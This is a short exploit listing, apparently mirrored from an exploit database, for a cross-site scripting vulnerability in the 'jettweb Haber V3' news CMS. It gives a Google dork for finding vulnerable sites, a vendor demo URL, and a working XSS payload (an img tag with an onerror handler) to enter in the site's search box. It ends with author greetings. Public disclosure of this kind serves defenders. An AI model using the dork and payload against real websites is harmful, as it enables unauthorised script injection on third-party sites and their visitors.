Exploit for Yazilimi Jettweb 3 Cross Site Scripting

Name: Exploit for Yazilimi Jettweb 3 Cross Site Scripting
Rating: 5 (116 reviews)

2023-01-17 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:170525
====================================================================================================================================  
| # Title : yazılımı jettweb Haber V3 XSS Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |  
| # Vendor : http://haberv3.proemlaksitesi.net/ |   
| # Dork : "yazılımı jettweb" |  
====================================================================================================================================  
  
poc :  
  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] In the search box, we use the payload : <--`<img/src=` onerror=confirm`https://cxsecurity.com/author/indoushka/1/`> --!>  
  
[+] test : https://127.0.0.1/haberv3proemlaksitesinet/   
  
  
==Greetings to :=========================================================================================================================  
| |  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet |  
| |  
=========================================================================================================================================